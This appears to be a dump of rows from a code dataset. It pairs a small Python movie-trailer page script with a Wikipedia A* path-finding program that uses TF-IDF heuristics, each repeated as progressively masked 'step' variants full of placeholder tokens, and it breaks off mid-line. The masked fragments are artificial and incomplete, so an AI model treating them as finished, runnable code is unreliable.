code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fresh_tomatoes.open_movies_page(movies)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
toy_story = media.Movie('Toy Story',
'A story of a boy and his toys that come to life',
'<p><a href="https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg" alt="The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\'s title. The background shows the cloud wallpaper featured in the bedroom."></a><br>By From <a rel="nofollow" class="external text" href="http://www.impawards.com/1995/toy_story_ver1.html">impawards</a>., <a href="https://en.wikipedia.org/w/index.php?curid=26009601">Link</a></p>'
, 'https://youtu.be/KYz2wyBy3kc')
avatar = media.Movie('Avatar', 'A marine on an alien planet',
'<p><a href="https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg" alt="Avatar-Teaser-Poster.jpg"></a><br>By Source, <a href="//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg" title="Fair use of copyrighted material in the context of Avatar (2009 film)">Fair use</a>, <a href="https://en.wikipedia.org/w/index.php?curid=23732044">Link</a></p>'
, 'https://youtu.be/5PSNL1qE6VY')
movies = [toy_story, avatar]
fresh_tomatoes.open_movies_page(movies)
<|reserved_special_token_1|>
import media
import fresh_tomatoes
toy_story = media.Movie('Toy Story',
'A story of a boy and his toys that come to life',
'<p><a href="https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg" alt="The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\'s title. The background shows the cloud wallpaper featured in the bedroom."></a><br>By From <a rel="nofollow" class="external text" href="http://www.impawards.com/1995/toy_story_ver1.html">impawards</a>., <a href="https://en.wikipedia.org/w/index.php?curid=26009601">Link</a></p>'
, 'https://youtu.be/KYz2wyBy3kc')
avatar = media.Movie('Avatar', 'A marine on an alien planet',
'<p><a href="https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg" alt="Avatar-Teaser-Poster.jpg"></a><br>By Source, <a href="//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg" title="Fair use of copyrighted material in the context of Avatar (2009 film)">Fair use</a>, <a href="https://en.wikipedia.org/w/index.php?curid=23732044">Link</a></p>'
, 'https://youtu.be/5PSNL1qE6VY')
movies = [toy_story, avatar]
fresh_tomatoes.open_movies_page(movies)
<|reserved_special_token_1|>
import media
import fresh_tomatoes
toy_story = media.Movie("Toy Story",
"A story of a boy and his toys that come to life",
'<p><a href="https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg" alt="The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\'s title. The background shows the cloud wallpaper featured in the bedroom."></a><br>By From <a rel="nofollow" class="external text" href="http://www.impawards.com/1995/toy_story_ver1.html">impawards</a>., <a href="https://en.wikipedia.org/w/index.php?curid=26009601">Link</a></p>',
"https://youtu.be/KYz2wyBy3kc")
avatar = media.Movie("Avatar",
"A marine on an alien planet",
'<p><a href="https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg" alt="Avatar-Teaser-Poster.jpg"></a><br>By Source, <a href="//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg" title="Fair use of copyrighted material in the context of Avatar (2009 film)">Fair use</a>, <a href="https://en.wikipedia.org/w/index.php?curid=23732044">Link</a></p>',
"https://youtu.be/5PSNL1qE6VY")
# print(avatar.storyline)
# avatar.show_trailer()
movies = [toy_story, avatar]
fresh_tomatoes.open_movies_page(movies)
# print(media.Movie.__doc__)
# print(media.Movie.__name__)
# print(media.Movie.__module__)
|
flexible
|
{
"blob_id": "e2f6e6e872f95471ebbc8b25bde08247fe8f7e61",
"index": 8829,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfresh_tomatoes.open_movies_page(movies)\n",
"step-3": "<mask token>\ntoy_story = media.Movie('Toy Story',\n 'A story of a boy and his toys that come to life',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\" alt=\"The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\\'s title. The background shows the cloud wallpaper featured in the bedroom.\"></a><br>By From <a rel=\"nofollow\" class=\"external text\" href=\"http://www.impawards.com/1995/toy_story_ver1.html\">impawards</a>., <a href=\"https://en.wikipedia.org/w/index.php?curid=26009601\">Link</a></p>'\n , 'https://youtu.be/KYz2wyBy3kc')\navatar = media.Movie('Avatar', 'A marine on an alien planet',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg\" alt=\"Avatar-Teaser-Poster.jpg\"></a><br>By Source, <a href=\"//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg\" title=\"Fair use of copyrighted material in the context of Avatar (2009 film)\">Fair use</a>, <a href=\"https://en.wikipedia.org/w/index.php?curid=23732044\">Link</a></p>'\n , 'https://youtu.be/5PSNL1qE6VY')\nmovies = [toy_story, avatar]\nfresh_tomatoes.open_movies_page(movies)\n",
"step-4": "import media\nimport fresh_tomatoes\ntoy_story = media.Movie('Toy Story',\n 'A story of a boy and his toys that come to life',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\" alt=\"The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\\'s title. The background shows the cloud wallpaper featured in the bedroom.\"></a><br>By From <a rel=\"nofollow\" class=\"external text\" href=\"http://www.impawards.com/1995/toy_story_ver1.html\">impawards</a>., <a href=\"https://en.wikipedia.org/w/index.php?curid=26009601\">Link</a></p>'\n , 'https://youtu.be/KYz2wyBy3kc')\navatar = media.Movie('Avatar', 'A marine on an alien planet',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg\" alt=\"Avatar-Teaser-Poster.jpg\"></a><br>By Source, <a href=\"//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg\" title=\"Fair use of copyrighted material in the context of Avatar (2009 film)\">Fair use</a>, <a href=\"https://en.wikipedia.org/w/index.php?curid=23732044\">Link</a></p>'\n , 'https://youtu.be/5PSNL1qE6VY')\nmovies = [toy_story, avatar]\nfresh_tomatoes.open_movies_page(movies)\n",
"step-5": "import media\nimport fresh_tomatoes\n\ntoy_story = media.Movie(\"Toy Story\",\n \"A story of a boy and his toys that come to life\",\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\" alt=\"The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\\'s title. The background shows the cloud wallpaper featured in the bedroom.\"></a><br>By From <a rel=\"nofollow\" class=\"external text\" href=\"http://www.impawards.com/1995/toy_story_ver1.html\">impawards</a>., <a href=\"https://en.wikipedia.org/w/index.php?curid=26009601\">Link</a></p>',\n \"https://youtu.be/KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\",\n \"A marine on an alien planet\",\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg\" alt=\"Avatar-Teaser-Poster.jpg\"></a><br>By Source, <a href=\"//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg\" title=\"Fair use of copyrighted material in the context of Avatar (2009 film)\">Fair use</a>, <a href=\"https://en.wikipedia.org/w/index.php?curid=23732044\">Link</a></p>',\n \"https://youtu.be/5PSNL1qE6VY\")\n\n# print(avatar.storyline)\n# avatar.show_trailer()\nmovies = [toy_story, avatar]\nfresh_tomatoes.open_movies_page(movies)\n# print(media.Movie.__doc__)\n# print(media.Movie.__name__)\n# print(media.Movie.__module__)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import annotations
import typing
import requests
import heapq
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import TfidfVectorizer
from bs4 import BeautifulSoup
from wikiAPI import get_JSON, get_intro, compare_titles
from typing import List, Type, Callable
def heuristic_0(a: str, b: str) -> float:
return 2
def heuristic_1(a: str, b: str) -> float:
"""
Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated
term-document matrices of the article. The heuristic in this case is purely semantic.
The HTML enriched query for the JSON is:
https://en.wikipedia.org/w/api.php?action=parse&page=TITLE&prop=text&formatversion=2&format=json
"""
query = "https://en.wikipedia.org/w/api.php?action=parse&page=TEMP&prop=text&formatversion=2&format=json"
startTitle = (a.replace(" ", "%20")).replace("&", "%26")
endTitle = (b.replace(" ", "%20")).replace("&", "%26")
startURL = (query.replace("TEMP", startTitle))
endURL = (query.replace("TEMP", endTitle))
# text processing using SOUP
initialSoup = BeautifulSoup(get_JSON(startURL)['parse']['text'], 'html.parser')
finalSoup = BeautifulSoup(get_JSON(endURL)['parse']['text'], 'html.parser')
# generate term-document matrices
corpus = [initialSoup.get_text().replace('\n', ' '), finalSoup.get_text().replace('\n', ' ')]
vect = TfidfVectorizer()
mat = vect.fit_transform(corpus)
# return cosine similarity
return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2
def heuristic_2(a: str, b: str) -> float:
"""
Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated
term-document matrices of the article. The heuristic in this case is purely semantic.
The HTML enriched query for the JSON is:
https://en.wikipedia.org/w/api.php?action=query&titles=TITLE&prop=extracts&format=json&exintro=1
"""
# generate term-document matrices
if get_intro(a) == "" or get_intro(b) == "":
return 2
else:
corpus = [get_intro(a), get_intro(b)]
vect = TfidfVectorizer()
mat = vect.fit_transform(corpus)
# return cosine similarity
return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2
# def semantic_similarity(a: str, b: str) -> float:
# web_model = WebBertSimilarity(device='cpu', batch_size=10)
# return web_model.predict([(a, b)])
class Article:
"""
This is the article class that represents each Wikipedia article.
Instance Variables:
- title: str that represents the title of the article
- target: the final target given by the user
- g:
- f:
"""
title: str
target: str
g: float
f: float
parent: typing.Union[Article, Type(None)]
heuristic: Callable[[str, str], float]
def __init__(self, title: str, target: str, parent: typing.Union[Article, Type(None)], heuristic: Callable[[str, str], float] ):
"""
Initializes based on [urls/titles/nodes]
"""
self.title = title
self.target = target
self.heuristic = heuristic
if parent:
self.parent = parent
self.g = parent.g + 1
else:
self.parent = None
self.g = 0
h = self.heuristic(title, target)
self.f = self.g + h
def get_children(self, cont: typing.Union[str, Type(None)]) -> List[str]:
"""
Return list of connected (children) article object using the wikipedia API functions.
"""
s = requests.Session()
url = "https://en.wikipedia.org/w/api.php"
if cont is None:
params = {
"action": "query",
"format": "json",
"titles": self.title,
"prop": "links",
"pllimit": "max"
}
else:
params = {
"action": "query",
"format": "json",
"titles": self.title,
"prop": "links",
"pllimit": "max",
"plcontinue": cont
}
titles_so_far = []
r = s.get(url=url, params=params)
data = r.json()
pages = data["query"]["pages"]
for k, v in pages.items():
if "links" not in v:
return []
for l in v["links"]:
titles_so_far.append(l["title"])
if "batchcomplete" in data:
return titles_so_far
else:
contHolder = data["continue"]["plcontinue"]
titles_so_far.extend(self.get_children(contHolder))
return titles_so_far
# return [Article(child, self.target, self.title) for child in titles_so_far]
def get_first_x(self, lst: List, x: int) -> List:
lst_so_far = []
for i in range(x):
lst_so_far.append(lst[i])
return lst_so_far
def __lt__(self, other):
return self.f < other.f
def __le__(self, other):
return self.f <= other.f
def __eq__(self, other):
return compare_titles(self.title, other.title)
def __ne__(self, other):
return not compare_titles(self.title, other.title)
def __gt__(self, other):
return self.f > other.f
def __ge__(self, other):
return self.f >= other.f
class PQ:
"""
MinHeap implementation of a priority queue for A* search.
"""
heap = []
def __init__(self):
self.heap = []
def insert(self, to_insert: Article) -> None:
"""
Insert new element in Priority queue
"""
heapq.heappush(self.heap, to_insert)
def pop(self) -> Article:
"""
pops minimum element from priority queue
"""
return heapq.heappop(self.heap)
def a_star(source: str, target: str, heuristic: Callable[[str, str], float]) -> list:
"""
Returns path from source to target using A* search algorithm.
"""
visited: set = set((source))
cur: Article = Article(source, target, None, heuristic)
queue = PQ()
while not compare_titles(cur.title, target):
nexts = cur.get_children(None)
for next in nexts:
if next not in visited:
article = Article(next, target, cur, heuristic)
queue.insert(article)
visited.add(next)
print(article.f, article.title)
cur = queue.pop()
print("CUR:", cur.f, cur.title)
path = [cur.title]
while path[0] != source:
cur = cur.parent
path.insert(0, cur.title)
return path
# print(a_star("Dog", "Aardwolf", heuristic_2))
|
normal
|
{
"blob_id": "1fad591fde707c73bd52aa8518828c8b8be9cd32",
"index": 2283,
"step-1": "<mask token>\n\n\nclass Article:\n <mask token>\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n <mask token>\n <mask token>\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n <mask token>\n <mask token>\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Article:\n <mask token>\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n <mask token>\n\n def __ge__(self, other):\n return self.f >= other.f\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Article:\n \"\"\"\n This is the article class that represents each Wikipedia article.\n\n Instance Variables:\n - title: str that represents the title of the article\n - target: the final target given by the user\n - g:\n - f:\n \"\"\"\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n\n def __gt__(self, other):\n return self.f > other.f\n\n def __ge__(self, other):\n return self.f >= other.f\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef heuristic_2(a: str, b: str) ->float:\n \"\"\"\n Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated\n term-document matrices of the article. The heuristic in this case is purely semantic.\n\n The HTML enriched query for the JSON is:\n https://en.wikipedia.org/w/api.php?action=query&titles=TITLE&prop=extracts&format=json&exintro=1\n \"\"\"\n if get_intro(a) == '' or get_intro(b) == '':\n return 2\n else:\n corpus = [get_intro(a), get_intro(b)]\n vect = TfidfVectorizer()\n mat = vect.fit_transform(corpus)\n return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2\n\n\nclass Article:\n \"\"\"\n This is the article class that represents each Wikipedia article.\n\n Instance Variables:\n - title: str that represents the title of the article\n - target: the final target given by the user\n - g:\n - f:\n \"\"\"\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n\n def __gt__(self, other):\n return self.f > other.f\n\n def __ge__(self, other):\n return self.f >= other.f\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-5": "from __future__ import annotations\nimport typing\nimport requests\nimport heapq\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom bs4 import BeautifulSoup\nfrom wikiAPI import get_JSON, get_intro, compare_titles\nfrom typing import List, Type, Callable\n\n\ndef heuristic_0(a: str, b: str) -> float:\n return 2\n\n\ndef heuristic_1(a: str, b: str) -> float:\n \"\"\"\n Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated\n term-document matrices of the article. The heuristic in this case is purely semantic.\n\n The HTML enriched query for the JSON is:\n https://en.wikipedia.org/w/api.php?action=parse&page=TITLE&prop=text&formatversion=2&format=json\n \"\"\"\n query = \"https://en.wikipedia.org/w/api.php?action=parse&page=TEMP&prop=text&formatversion=2&format=json\"\n startTitle = (a.replace(\" \", \"%20\")).replace(\"&\", \"%26\")\n endTitle = (b.replace(\" \", \"%20\")).replace(\"&\", \"%26\")\n startURL = (query.replace(\"TEMP\", startTitle))\n endURL = (query.replace(\"TEMP\", endTitle))\n # text processing using SOUP\n initialSoup = BeautifulSoup(get_JSON(startURL)['parse']['text'], 'html.parser')\n finalSoup = BeautifulSoup(get_JSON(endURL)['parse']['text'], 'html.parser')\n # generate term-document matrices\n corpus = [initialSoup.get_text().replace('\\n', ' '), finalSoup.get_text().replace('\\n', ' ')]\n vect = TfidfVectorizer()\n mat = vect.fit_transform(corpus)\n # return cosine similarity\n return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2\n\n\ndef heuristic_2(a: str, b: str) -> float:\n \"\"\"\n Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated\n term-document matrices of the article. The heuristic in this case is purely semantic.\n\n The HTML enriched query for the JSON is:\n https://en.wikipedia.org/w/api.php?action=query&titles=TITLE&prop=extracts&format=json&exintro=1\n \"\"\"\n # generate term-document matrices\n if get_intro(a) == \"\" or get_intro(b) == \"\":\n return 2\n else:\n corpus = [get_intro(a), get_intro(b)]\n vect = TfidfVectorizer()\n mat = vect.fit_transform(corpus)\n # return cosine similarity\n return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2\n\n\n# def semantic_similarity(a: str, b: str) -> float:\n # web_model = WebBertSimilarity(device='cpu', batch_size=10)\n # return web_model.predict([(a, b)])\n\n\nclass Article:\n \"\"\"\n This is the article class that represents each Wikipedia article.\n\n Instance Variables:\n - title: str that represents the title of the article\n - target: the final target given by the user\n - g:\n - f:\n \"\"\"\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[Article, Type(None)], heuristic: Callable[[str, str], float] ):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) -> List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n\n url = \"https://en.wikipedia.org/w/api.php\"\n\n if cont is None:\n params = {\n \"action\": \"query\",\n \"format\": \"json\",\n \"titles\": self.title,\n \"prop\": \"links\",\n \"pllimit\": \"max\"\n }\n else:\n params = {\n \"action\": \"query\",\n \"format\": \"json\",\n \"titles\": self.title,\n \"prop\": \"links\",\n \"pllimit\": \"max\",\n \"plcontinue\": cont\n }\n\n titles_so_far = []\n\n r = s.get(url=url, params=params)\n data = r.json()\n\n pages = data[\"query\"][\"pages\"]\n\n for k, v in pages.items():\n if \"links\" not in v:\n return []\n\n for l in v[\"links\"]:\n titles_so_far.append(l[\"title\"])\n\n if \"batchcomplete\" in data:\n return titles_so_far\n else:\n contHolder = data[\"continue\"][\"plcontinue\"]\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n # return [Article(child, self.target, self.title) for child in titles_so_far]\n\n def get_first_x(self, lst: List, x: int) -> List:\n lst_so_far = []\n\n for i in range(x):\n lst_so_far.append(lst[i])\n\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n\n def __gt__(self, other):\n return self.f > other.f\n\n def __ge__(self, other):\n return self.f >= other.f\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) -> None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) -> Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\ndef a_star(source: str, target: str, heuristic: Callable[[str, str], float]) -> list:\n \"\"\"\n Returns path from source to target using A* search algorithm.\n \"\"\"\n visited: set = set((source))\n cur: Article = Article(source, target, None, heuristic)\n queue = PQ()\n\n while not compare_titles(cur.title, target):\n 